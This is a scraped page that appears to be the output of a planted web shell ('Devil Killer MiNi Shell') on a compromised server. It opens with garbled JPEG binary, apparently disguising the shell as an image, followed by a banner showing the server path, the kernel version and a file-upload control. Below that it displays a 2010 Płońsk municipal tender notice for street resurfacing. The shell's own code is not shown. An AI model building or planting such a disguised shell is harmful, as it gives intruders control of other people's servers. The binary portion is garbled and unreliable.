JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100709/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100709/202824-N-2010.html

<p class="kh_header"><b>Płońsk: Remonty  nawierzchni bitumicznych ulic gminnych w Płońsku</b><br>
<b>Numer ogłoszenia: 202824 - 2010; data zamieszczenia: 09.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Płońsk reprezentowana przez Burmistrza Miasta Płońsk , ul. Płocka 39, 09-100 Płońsk, woj. mazowieckie, tel. 023 6622691, faks 023 663 13 40.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.plonsk.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remonty  nawierzchni bitumicznych ulic gminnych w Płońsku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są: Remonty  nawierzchni bitumicznych ulic gminnych 
w Płońsku: 
1)ul. 1-go Maja (na odcinku od ul. Róży Luksemburg  do torów kolejowych):
-długość remontowanego odcinka - 290 mb
- regulacja studzienek dla urządzeń podziemnych (studnie 14 szt., wpusty 1 szt., zawory 15 szt.)
-skropienie nawierzchni drogowych asfaltem - 1 985,00 m2 
-wykonanie nawierzchni z mieszanek mineralno-asfaltowych gr. 4 cm 
- 1 985,00 m2

2)ul. Karulaka:
-długość remontowanego odcinka - 80 mb
- rozbiórka krawężników - 140 mb
- rozbiórka obrzeży trawnikowych - 30 mb
- mechaniczne rozebranie podbudowy z mas mineralno bitumicznych  gr 8 cm na jezdni - 350 m2
- mechaniczne rozebranie podbudowy z kruszywa gr 15 cm na jezdni - 420 m2
- mechaniczne rozebranie nawierzchni z mas mineralno bitumicznych na chodnikach gr 4 cm - 350 m2
- mechaniczne rozebranie podbudowy z kruszywa gr 15 cm na chodnikach - 350 m2
- roboty ziemne - 210 m3
- korytowanie jezdni i chodników  o gł. 30 cm - 700 m2
- wykonanie i zagęszczanie warstw odsączających, gr. warstwy po zagęszczeniu 10 cm - 700 m2
- wykonanie podbudowy z kruszywa łamanego gr. 20 cm - 210 m2
- krawężniki betonowe 15x30 cm wraz z wykonaniem ław betonowych - 40 mb
- wykonanie nawierzchni z kostki brukowej betonowej  gr. 8 cm kolorowej na podsypce cementowo-piaskowej - 700,00 m2

3)ul. Kolejowa (na odcinku od ul. ZWM do ul. Towarowej):
- długość remontowanego odcinka - 460 mb
- frezowanie nawierzchni asfaltowej na gł. 4 cm - 3 119,60 m2
- rozbiórka krawężników - 50 mb
- mechaniczne rozebranie ław z betonu gr 15 cm - 15,2 m2 
- krawężniki betonowe 15x30 cm wraz z wykonaniem ław betonowych - 50 mb
- wyrównanie betonu asfaltowego, warstwa wiążąca gr 3 cm - 3149,60 m2
- regulacja studzienek dla urządzeń podziemnych (studnie 10 szt., wpusty 4 szt., zawory 13 szt.)
- dwukrotne skropienie nawierzchni drogowych asfaltem - 3149,60 m2 
- wykonanie nawierzchni z mieszanek mineralno-asfaltowych warstwa ścieralna gr. 4 cm - 3 149,60 m2

4)ul. Paderewskiego:
- długość remontowanego odcinka - 300 mb
- frezowanie nawierzchni asfaltowej na gł. 4 cm - 260,00 m2
- regulacja studzienek dla urządzeń podziemnych (studnie 10 szt., wpusty 10 szt., zawory 6 szt.)
- skropienie nawierzchni drogowych asfaltem - 2 381,30 m2 
- wykonanie nawierzchni z mieszanek mineralno-asfaltowych warstwa ścieralna gr. 4 cm - 2 381,30 m2

5)ul. Padlewskiego:
- długość remontowanego odcinka - 450 mb
- frezowanie nawierzchni asfaltowej na gł. 4 cm - 2 554,64 m2
- rozbiórka krawężników - 90 mb
- mechaniczne rozebranie ław z betonu gr 15 cm - 27,20 m2 
- krawężniki betonowe 15x30 cm wraz z wykonaniem ław betonowych - 90 mb
- wyrównanie betonu asfaltowego, warstwa wiążąca gr 3 cm - 2 884,03 m2
- regulacja studzienek dla urządzeń podziemnych (studnie 13 szt., zawory 9 szt.)
- dwukrotne skropienie nawierzchni drogowych asfaltem - 2 884,03 m2 
- wykonanie nawierzchni z mieszanek mineralno-asfaltowych warstwa ścieralna gr. 4 cm - 2 884,03 m2

6)ul. Północna (na odcinku od bud. mieszkalnego nr 3 do ul. Grunwaldzkiej):
- długość remontowanego odcinka ulicy - 530 mb
- frezowanie nawierzchni asfaltowej na gł. 4 cm - 4 885,00 m2
- wyrównanie betonu asfaltowego, warstwa wiążąca gr 3 cm - 4 885,00 m2
- regulacja studzienek dla urządzeń podziemnych (studnie 21 szt., wpusty 15, zawory 6 szt.)
- dwukrotne skropienie nawierzchni drogowych asfaltem - 4 885,00 m2 
- wykonanie nawierzchni z mieszanek mineralno-asfaltowych warstwa ścieralna gr. 4 cm - 4 885,00 m2
- mech. rozebranie nawierzchni z mas mineralno-bitumicznych na chodniku - 364,00 m2
- rozebranie obrzeży trawnikowych - 464,00 mb
- obrzeża betonowe 20x6 cm na podsypce piaskowej - 646,00 mb
- wykonanie nawierzchni z kostki brukowej betonowej  gr. 6 cm kolorowej na podsypce cementowo-piaskowej - 363,00 m2

7)ul. Ogrodowa (na odcinku od ul. ZWM do ul. Składowej):
- długość remontowanego odcinka - 250 mb
- frezowanie nawierzchni asfaltowej na gł. 4 cm - 1 373,00 m2
- rozbiórka krawężników - 504,00 mb
- mechaniczne rozebranie ław z betonu gr 15 cm - 151,60 m2 
- krawężniki betonowe 15x30 cm wraz z wykonaniem ław betonowych - 504,00 mb
- dwukrotne skropienie nawierzchni drogowych asfaltem - 1 373,00 m2 
- wyrównanie betonu asfaltowego, warstwa wiążąca gr 3 cm - 1 373,00 m2
- regulacja studzienek dla urządzeń podziemnych (studnie 12 szt., wpusty 6 szt. zawory 15 szt.)
- wykonanie nawierzchni z mieszanek mineralno-asfaltowych warstwa ścieralna gr. 4 cm - 1 373,00 m2

8)ul. Spółdzielcza:
- długość remontowanego odcinka - 170 mb
- frezowanie nawierzchni asfaltowej na gł. 4 cm - 161,00 m2
- wyrównanie betonu asfaltowego, warstwa wiążąca gr 3 cm - 1 155,20 m2
- regulacja studzienek dla urządzeń podziemnych (studnie 7 szt., wpusty 2 szt. zawory 3 szt.)
- dwukrotne skropienie nawierzchni drogowych asfaltem - 1 155,20m2 
- wykonanie nawierzchni z mieszanek mineralno-asfaltowych warstwa ścieralna gr. 4 cm - 1 155,20 m2

9)ul. Warszawska (na odcinku od ul. Wyszogrodzkiej do Pl. 15-go Sierpnia):
- długość remontowanego odcinka - 330 mb
- frezowanie nawierzchni asfaltowej na gł. 4 cm - 2 326,40 m2
- wyrównanie betonu asfaltowego, warstwa wiążąca gr 3 cm - 2 326,40 m2
- regulacja studzienek dla urządzeń podziemnych (studnie 4 szt., wpusty 2 szt. zawory 4 szt.)
- dwukrotne skropienie nawierzchni drogowych asfaltem 2 326,40 m2 
- wykonanie nawierzchni z mieszanek mineralno-asfaltowych warstwa ścieralna gr. 4 cm - 2 326,40 m2

10)ul. Wieczorków (na odcinku od przejazdu kolejowego):
- długość remontowanego odcinka - 690 mb
- frezowanie nawierzchni asfaltowej na gł. 4 cm - 1 083,50 m2
- korytowanie jezdni   o gł. 40 cm - 404,40 m2
- wykonanie i zagęszczanie warstw odsączających, gr. warstwy po zagęszczeniu 10 cm - 471,80 m2
- wykonanie podbudowy z kruszywa łamanego gr. 25 cm - 404,40  m2
- kanały z rur PCV o śr. 160 mm - 36,00 mb
- studzienki ściekowe uliczne o śr. 500 mm z osadnikiem - 6 szt.
- wyrównanie istniejącej nawierzchni kamieniem łamanym - 40,20 m3
- wyrównanie betonu asfaltowego, warstwa wiążąca gr 3 cm - 4 381,00 m2
- regulacja studzienek dla urządzeń podziemnych (studnie 7 szt., wpusty 8 szt. zawory 4 szt.)
- dwukrotne skropienie nawierzchni drogowych asfaltem 4 381,00 m2 
- wykonanie nawierzchni z mieszanek mineralno-asfaltowych warstwa ścieralna gr. 4 cm - 4 381,00 m2

11)ul. Wojska Polskiego:
- długość remontowanego odcinka - 430 mb
- frezowanie nawierzchni asfaltowej na gł. 4 cm - 3 911,00 m2
- wyrównanie betonu asfaltowego, warstwa wiążąca gr 3 cm - 3 911,00 m2
- regulacja studzienek dla urządzeń podziemnych (studnie 14 szt., wpusty 18 szt. zawory 5 szt.)
- dwukrotne skropienie nawierzchni drogowych asfaltem 3 911,00 m2 
- wykonanie nawierzchni z mieszanek mineralno-asfaltowych warstwa ścieralna gr. 4 cm - 3 911,00 m2

12)ul. Zajazd:
- długość remontowanego odcinka - 460 mb
- frezowanie nawierzchni asfaltowej na gł. 4 cm - 2 989,00 m2
- wyrównanie betonu asfaltowego, warstwa wiążąca gr 3 cm - 3 303,00 m2
- regulacja studzienek dla urządzeń podziemnych (studnie 5 szt., wpusty 2 szt. zawory 7 szt.)
- dwukrotne skropienie nawierzchni drogowych asfaltem 3 303,00 m2 
- wykonanie nawierzchni z mieszanek mineralno-asfaltowych warstwa ścieralna gr. 4 cm - 3 303,00 m2

13)Most na ul Grunwaldzkiej:      	
- demontaż i montaż nowych barieroporęczy mostowych - 3,5 t
- czyszczenie studzienek ściekowych wraz z rurami spustowymi - 4 szt.

Szczegółowe wymagania Zamawiającego co do sposobu realizacji przedmiotu zamówienia według załączonej dokumentacji opisowo-kosztorysowej. Wykonawca powinien dysponować dostępem do wytwórni mas bitumicznych położonej nie dalej niż 2 godz.  jazdy od miejsca wbudowania masy. Wykonawca zobowiązany jest wykonać przedmiot zamówienia zgodnie ze sztuką budowlaną,  z obowiązującymi przepisami prawa, a w szczególności ustawą z 7 lipca 1994 r. Prawo budowlane ( tekst jednolity z 2006 r. Nr 156, poz. 1118 ze zm.) oraz dokumentacją techniczną: opisowo-kosztorysową remontu nawierzchni bitumicznej ul.: Północnej, Spółdzielczej, Wojska Polskiego, Wieczorków, Kolejowej, Ogrodowej, Padlewskiego, Karulaka, 1 Maja, Paderewskiego, Warszawskiej, Zajazd, mostu                       w ul. Grunwaldzkiej i zgodnie ze Specyfikacją Techniczną Wykonania i Odbioru Robót.
Prace muszą być wykonane zgodnie z warunkami technicznymi i wymogami oraz normami przy tego typu robotach.
Wszystkie materiały wykorzystane do wykonania przedmiotu zamówienia muszą być dopuszczone do stosowania zgodnie z obowiązującymi przepisami. 
Przed przygotowaniem oferty Wykonawca może dokonać wizji lokalnej miejsca robót remontowych oraz zdobyć własnym staraniem wszelkie informacje, które mogą być konieczne do przygotowania oferty oraz podpisania umowy.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7, 45.23.31.40-2, 45.23.32.52-0, 45.23.31.41-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.10.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Ustala się wadium do zamówienia w wysokości:  20 000,00 zł, słownie: dwadzieścia tysięcy złotych.
2. Wadium może być wnoszone w jednej lub kilku formach zgodnie z art. 45 ust. 6 ustawy Pzp.
3. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy prowadzony przez Bank Spółdzielczy w Płońsku:
nr rachunku 73 8230 0007 0004 5636 2000 0003
- na przelewie bankowym należy wskazać tytuł przedmiotu zamówienia:  

Remonty nawierzchni bitumicznych ulic gminnych w Płońsku, nasz znak: ZP.341-18/10.

4. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.
5. Wadium wniesione w pieniądzu należy złożyć przed upływem terminu składania ofert, przy czym za termin wniesienia wadium w formie pieniężnej przyjmuje się termin uznania na rachunku bankowym Zamawiającego. Potwierdzenie wpłaty wadium należy załączyć do oferty.
6. Wadium wniesione w pieniądzu zostanie zwrócone wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
7. Wadium wniesione w formie innej niż pieniądz należy załączyć w formie oryginału  do oferty.
7.8. Wykonawca, który nie wniósł wadium zostanie wykluczony z postępowania.
9. Zamawiający zwraca niezwłocznie wadium zgodnie z art. 46 ust.1, 1a i 2 ustawy Pzp.
10. Zamawiający żąda ponownego wniesienia wadium przez Wykonawców, którym zwrócono wadium, na podstawie art.46 ust.3 ustawy Pzp., jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. W tej sytuacji Wykonawca wnosi wadium w terminie określonym przez Zamawiającego. 
11. Zamawiający zatrzymuje wadium wraz z odsetkami zgodnie z art. 46 ust. 4a i ust. 5 ustawy Pzp</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda  załączenia do oferty dokumentu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi przedstawić wykaz wykonanych robót budowlanych w zakresie niezbędnym do wykazania spełniania warunków wiedzy i doświadczenia, wykonywanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. Wykonawca musi wykazać się realizacją minimum 1 roboty budowlanej podobnej do oferowanego przedmiotu zamówienia tj. wykonanie remontu nawierzchni drogi masą bitumiczną układaną na gorąco oraz remontu nawierzchni wykonanej z kostki brukowej betonowej zgodnie z załącznikiem nr 4 do siwz. 
Ocena spełnienia wymaganego warunku odbywa się, zgodnie z regułą: spełnia albo nie spełnia, na podstawie dokumentów załączonych do oferty, przez Wykonawcę, zgodnych z niniejszą siwz. Niespełnienie warunku skutkować będzie wykluczeniem Wykonawcy z postępowania</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz narzędzi, dostępnych Wykonawcy roboty budowlanej w celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami. Wykonawca powinien wykazać, że dysponuje minimum 1 frezarką do asfaltu o szerokości frezowania 2 m, walcem drogowym 8-12 ton, układarką mas bitumicznych o elektronicznym układzie sterowania. Pojazdy używane do wykonania zamówienia powinny być wyposażone w ostrzegawczy sygnał świetlny zgodnie z ustawą Prawo o ruchu drogowym z 20.06.1997r. (tekst jednolity Dz. U. z 2005 r Nr 108 poz. 908 ze zmianami) oraz w środki łączności zgodnie z załącznikiem nr 5 do siwz. Ocena spełnienia wymaganego warunku odbywa się, zgodnie z regułą: spełnia albo nie spełnia, na podstawie dokumentów załączonych do oferty, przez Wykonawcę, zgodnych z niniejszą siwz. Niespełnienie warunku skutkować będzie wykluczeniem Wykonawcy z postępowania</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca powinien przedstawić wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami. Wykonawca powinien wykazać, że dysponuje minimum 1 osobą Kierownikiem budowy  posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-inżynieryjnej w zakresie budowy dróg i mostów oraz minimum 1 osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjno - inżynieryjnej w zakresie sieci kanalizacyjnych na podstawie Rozporządzenia Min. Transportu i Budownictwa z 28.04.2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie. Do wykazu należy dołączyć oświadczenie potwierdzające wpis danej osoby na listę członków właściwej izby zgodnie z załącznikiem  nr 6 do siwz.Ocena spełnienia wymaganego warunku odbywa się, zgodnie z regułą: spełnia albo nie spełnia, na podstawie dokumentów załączonych do oferty, przez Wykonawcę, zgodnych z niniejszą siwz. Niespełnienie warunku skutkować będzie wykluczeniem Wykonawcy z postępowania</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda  załączenia do oferty dokumentu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
